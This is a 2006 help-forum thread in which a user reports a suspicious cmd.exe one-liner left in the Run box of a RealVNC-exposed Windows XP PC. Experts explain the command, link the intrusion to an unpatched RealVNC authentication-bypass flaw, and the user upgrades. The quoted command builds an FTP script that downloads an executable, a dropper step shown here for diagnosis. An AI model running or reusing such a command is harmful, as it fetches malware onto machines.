Solved

Have I been hacked ?

Posted on 2006-11-02
6
1,346 Views
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean please ?
0
Comment
Question by:EugeneGardner
  • 3
  • 2
6 Comments
 
LVL 9

Accepted Solution

by:
FixingStuff earned 40 total points
Comment Utility
Looks like there was a hack attempt. the command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it trys to run FTP using the above file as a script.

You are either wide open on the internet.... no firewall, or have port forwarding to VNC, which will get port scanned constantly.
Recommendation LOCK DOWN YOUR MACHINE ASAP.  At least change the default port on VNC.

Go here and run SheildsUP to check your open ports to the world.
www.grc.com

FS-
0
 
LVL 1

Author Comment

by:EugeneGardner
Comment Utility
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued as my Real VNS connection is password protected.  And where would the e_53.exe file be dropped ?  I can't find it anywhere.  Another thing I don't understand is what would the point of running a script like that be ?  There is no execute command !
0
 
LVL 9

Expert Comment

by:FixingStuff
Comment Utility
Good that you are secure!
You probably should go back to GRC sheildsup and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
0
Why You Should Analyze Threat Actor TTPs

After years of analyzing threat actor behavior, it’s become clear that at any given time there are specific tactics, techniques, and procedures (TTPs) that are particularly prevalent. By analyzing and understanding these TTPs, you can dramatically enhance your security program.

 
LVL 21

Assisted Solution

by:briancassin
briancassin earned 20 total points
Comment Utility
this issue seems to be directly related to Real VNC

 how old is it ?

because their was a serious security flaw found back around May of this year if you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users access a remote computer from a local PC. The company distributes the software in three versions—free, personal and enterprise edition. The vulnerability is caused due to an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
0
 
LVL 1

Author Comment

by:EugeneGardner
Comment Utility
Ahh - good point.  I'm running version 4.1.1   I have just downloaded version 4.1.2
Thanks.
0
 
LVL 9

Expert Comment

by:FixingStuff
Comment Utility
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-
0

Featured Post

Highfive Gives IT Their Time Back

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

Join & Write a Comment

The term "Bad USB" is a buzz word that is usually used when talking about attacks on computer systems that involve USB devices. In this article, I will show what possibilities modern windows systems (win8.x and win10) offer to fight these attacks wi…
SHARE your personal details only on a NEED to basis. Take CHARGE and SECURE your IDENTITY. How do I then PROTECT myself and stay in charge of my own Personal details (and) - MY own WAY...
In this seventh video of the Xpdf series, we discuss and demonstrate the PDFfonts utility, which lists all the fonts used in a PDF file. It does this via a command line interface, making it suitable for use in programs, scripts, batch files — any pl…
Get a first impression of how PRTG looks and learn how it works.   This video is a short introduction to PRTG, as an initial overview or as a quick start for new PRTG users.

771 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

11 Experts available now in Live!

Get 1:1 Help Now